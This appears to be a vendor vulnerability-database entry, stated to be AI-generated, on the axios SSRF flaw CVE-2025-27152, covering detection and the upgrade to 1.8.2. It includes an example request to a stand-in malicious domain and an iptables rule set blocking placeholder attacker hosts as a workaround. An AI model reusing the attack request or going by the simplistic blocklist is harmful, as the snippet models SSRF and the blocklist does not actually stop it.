SentinelOne
CVE Vulnerability Database
Vulnerability Database/CVE-2025-27152

CVE-2025-27152: Axios HTTP Client SSRF Vulnerability

CVE-2025-27152 is an SSRF vulnerability in Axios HTTP client that allows attackers to bypass baseURL settings and send requests to arbitrary URLs, risking credential leakage. This article covers the technical details, affected versions, security impact, and mitigation strategies.

Updated:

CVE-2025-27152 Overview

axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in version 1.8.2.

Critical Impact

The vulnerability in axios could lead to Server-Side Request Forgery (SSRF) and credential leakage, impacting confidentiality and integrity.

Affected Products

  • axios axios

Discovery Timeline

  • Not Available - Vulnerability discovered by Not Available
  • Not Available - Responsible disclosure to axios
  • Not Available - CVE CVE-2025-27152 assigned
  • Not Available - axios releases security patch
  • 2025-03-07T16:15:38.773 - CVE CVE-2025-27152 published to NVD
  • 2025-09-22T18:52:22.807 - Last updated in NVD database

Technical Details for CVE-2025-27152

Vulnerability Analysis

The vulnerability arises when axios handles absolute URLs instead of protocol-relative URLs. In such cases, the baseURL configuration is bypassed, leading to potentially unintended destinations being contacted, which can facilitate SSRF attacks and result in credential leakage.

Root Cause

The root cause is the mishandling of URL configurations within axios, where absolute URLs take precedence over a predefined baseURL.

Attack Vector

This vulnerability is exploited over the network, where an attacker crafts a request with an absolute URL to divert the request to malicious endpoints.

javascript
// Example exploitation code (sanitized)
axios.defaults.baseURL = 'https://safe-domain.com';
axios.get('http://malicious-domain.com/data')
  .then(response => console.log(response))
  .catch(error => console.error(error));

Detection Methods for CVE-2025-27152

Indicators of Compromise

  • Requests being sent to unexpected or malicious domains
  • Unusual outbound traffic patterns
  • Unauthorized data access or API calls logs

Detection Strategies

  • Analyze network traffic for unexpected outbound requests originating from axios clients.
  • Implement logging mechanisms to capture complete request details and compare them against known safe domains.

Monitoring Recommendations

  • Utilize anomaly detection systems to identify irregular communication patterns.
  • Set up alerts for access to unauthorized or unexpected domain names.

How to Mitigate CVE-2025-27152

Immediate Actions Required

  • Upgrade to axios version 1.8.2 or later
  • Review all axios configurations to ensure no hardcoded absolute URLs
  • Implement strict outbound traffic rules and domain whitelisting

Patch Information

The issue has been resolved in axios version 1.8.2. All users of earlier versions should upgrade immediately.

Workarounds

  • Implement network-level access controls to restrict requests to known safe endpoints only.
bash
# Configuration example
yum install iptables
iptables -A OUTPUT -d evil.com -j DROP
iptables -A OUTPUT -d maliciou-site.com -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne